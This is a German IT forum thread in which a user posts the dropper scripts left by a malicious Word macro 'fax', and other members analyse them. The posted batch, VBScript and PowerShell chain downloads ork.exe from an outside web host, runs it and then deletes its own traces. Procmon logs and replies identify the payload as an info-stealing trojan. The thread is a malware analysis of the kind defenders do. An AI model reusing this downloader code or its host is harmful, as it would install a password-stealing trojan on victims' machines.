Kann mir das jemand erläutern?
Moin,
heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.
-> VM an -> Office drauf -> Spaß
Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:
444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat
adobeacd-update.vbs
adobeacd-update.ps1
Was genau macht das?
heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.
-> VM an -> Office drauf -> Spaß
Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:
444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat
@echo off
ping 1.1.2.2 -n 2
cscript.exe "c:\windows\temp\adobeacd-update.vbs"
exitadobeacd-update.vbs
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = "231"
Set objFSO=CreateObject("Scripting.FileSystemObject")
currentFile = "c:\windows\temp\adobeacd-update.ps1"
caisudkh38e = "231"
quid8hiqje = "231"
Set objShell = CreateObject("Wscript.shell")
caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd = "231"
objShell.run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true
caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = "231" adobeacd-update.ps1
$hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3';
$hash = '0';
$down = New-Object System.Net.WebClient;
$url = 'http://idtvietnam.vn/images/ork.exe';
$hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd';
$file = 'c:\windows\temp\444.exe';
$hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd';
$down.DownloadFile($url,$file);
$ScriptDir = $MyInvocation.ScriptName;
$someFilePath = 'c:\windows\temp\' + '444.exe';
$vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.vbs';
$batFilePath = 'c:\windows\temp\' + 'adobeacd-update.bat';
$psFilePath = 'c:\windows\temp\' + 'adobeacd-update.ps1';
Start-Sleep -s 10;
cmd.exe /c 'c:\windows\temp\444.exe';
$file1 = gci $vbsFilePath -Force
$file2 = gci $batFilePath -Force
$file3 = gci $psFilePath -Force
$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }
If (Test-Path $batFilePath){ Remove-Item $batFilePath }
If (Test-Path $someFilePath){ Remove-Item $someFilePath }
Remove-Item $MyINvocation.InvocationNameWas genau macht das?
Kommentieren
Teilen
Auf Facebook teilen
Auf X (Twitter) teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 254187
Url: https://administrator.de/forum/kann-mir-das-jemand-erlaeutern-254187.html
Ausgedruckt am: 29.04.2025 um 11:04 Uhr
15 Kommentare
Neuester Kommentar
Hi Xaero,
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:
Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe' die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.
Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern"
. Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !
Grüße Uwe
p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:
Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe' die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.
Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern"
. Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !Grüße Uwe
p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus
Also so wirklich klar was die 444.exe macht ist mir nicht... jedenfalls hats die VM zerlegt
VirtualMachine sagt: Ein schwerwiegender Fehler ist aufgetreten, und die Ausführung der vM wurde unterbrochen.
-> Logs gucken
Kann man rausbekommen was die 444.exe macht?
Danke erst mal
Grüße
VirtualMachine sagt: Ein schwerwiegender Fehler ist aufgetreten, und die Ausführung der vM wurde unterbrochen.
-> Logs gucken
Kann man rausbekommen was die 444.exe macht?
Danke erst mal
Grüße
- Olydbg anwerfen
- File durch den Disassembler jagen
- Gleichzeitig Procmon laufen lassen
Was für lange Winterabende
Schönes Wochenende
Grüße Uwe
Procmon mit welchem Filter?
Danke, dir auch
Grüße
und vor allem was mach ich damit? also mit dem Ollydbg
Danke, dir auch
Grüße
und vor allem was mach ich damit?
also mit dem Ollydbg
Na zuerst mal auf den Prozess 444.exe, später dann auf andere je nachdem was das Teil so macht ...
Offenbar macht der ne Menge.
Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.
Insgesamt 6149 Zugriffe.
Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.
Insgesamt 6149 Zugriffe.
Zitat von @Xaero1982:
Offenbar macht der ne Menge.
Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.
Insgesamt 6149 Zugriffe.
wenn du jetzt noch nach Category = "Write" filterst siehst du was er eventuell verändert. Könnte aber auch ein einfacher Datendieb sein der in Dateien und Registry-Einträgen nach Passwörtern scannt und diese an den CC-Server sendet.Offenbar macht der ne Menge.
Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.
Insgesamt 6149 Zugriffe.
Lad das Teil doch einfach mal auf VirusTotal.com hoch, ob es schon in den Definitionen der AntiVirus-Hersteller verzeichnet ist.
Aber wahrscheinlich willst du damit nur etwas üben, gelle
Schau ich mal mit dem Filter... danke
Naja ich will eigentlich wissen was der Spaß macht... üben... joa auch das
https://www.virustotal.com/de/file/59b2bc1bdf983b47bad926ef3808f9493c100 ...
Naja ich will eigentlich wissen was der Spaß macht... üben... joa auch das
https://www.virustotal.com/de/file/59b2bc1bdf983b47bad926ef3808f9493c100 ...
Das kam bei raus:
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"09:53:33,1463901","ork.exe","2380","RegSetValue","HKLM\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size","SUCCESS","Type: REG_SZ, Length: 12, Data: 65536"
"09:53:33,5291740","ork.exe","2380","CreateFile","C:\Users\Administrator\Desktop\","NAME INVALID","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: 0"
"09:53:38,4024746","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Read, Disposition: Create, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: None, AllocationSize: 0, OpenResult: Created"
"09:53:38,4027583","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Write, AllocationSize: 0, OpenResult: Overwritten"
"09:53:38,4028118","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 0, Length: 9, Priority: Normal"
"09:53:38,4029443","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 9, Length: 8"
"09:53:38,4029526","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 9, Length: 8, Priority: Normal"
"09:53:38,4029708","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 17, Length: 9"
"09:53:38,4029772","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 17, Length: 9, Priority: Normal"
"09:53:38,4029884","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 26, Length: 1"
"09:53:38,4029945","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 26, Length: 1, Priority: Normal"
"09:53:38,5466385","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"
"09:53:38,5466503","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer","NAME NOT FOUND",""
"09:53:38,5466579","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride","NAME NOT FOUND",""
"09:53:38,5466637","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL","NAME NOT FOUND",""
"09:53:38,5466692","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect","NAME NOT FOUND",""
"09:53:38,5468236","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings","SUCCESS","Type: REG_BINARY, Length: 56, Data: 46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
"09:54:03,4389855","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Installer\Products\B808096432\LP","SUCCESS","Type: REG_SZ, Length: 100, Data: C:\Users\ADMINI~1\AppData\Local\Temp\1\L808096432"
dann schau mal was das Teil in die Temp-Datei tmp74A4.tmp schreibt, ich vermute es dupliziert sich als Backup.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.
Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.
Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.
Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.
Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Also damit kann sich wohl niemand nen Ei machen:
Nach Hause telefoniert da irgendwie nix...
Link zum runterladen der exe is oben xD
LP=C:\Users\ADMINI~1\AppData\Local\Temp\L808096432
[2]
D=0
OS=Windows Server 2012 / 64 bit
FS=NTFS
VID=808096432
M=1
[1]
ID=101
D=08.11.2014
T=17:49:29
CPID=3776
CFN=C:\Users\Administrator\Desktop\ork.exe
PPID=3096
PFN=cmd.exe
CDR=C:\Users\Administrator\Desktop
CUSR=HOME\administrator
EUSR=HOME\administrator
LVL=HIGHNach Hause telefoniert da irgendwie nix...
Link zum runterladen der exe is oben xD
Das ist ein Trojaner der sensitive Informationen über sein Opfer stiehlt:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471
Die Übermittlung muss nicht immer direkt stattfinden, das lässt sich meistens erst sagen wenn man den über einen längeren Zeitraum beobachtet. Es kann auch sein das der Server schon vom
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471
Win32/Rovnix is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine. It uses techniques common among rootkits.
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
Danke für den Link:
Win32/Rovnix not found
Win32/Rovnix not found
DNS-Request übersehen! optimalnewbie.co.uk ist aber schon länger trocken gelegt.
Könntest du recht haben, dass mir da sowas über den Weg gelaufen ist...
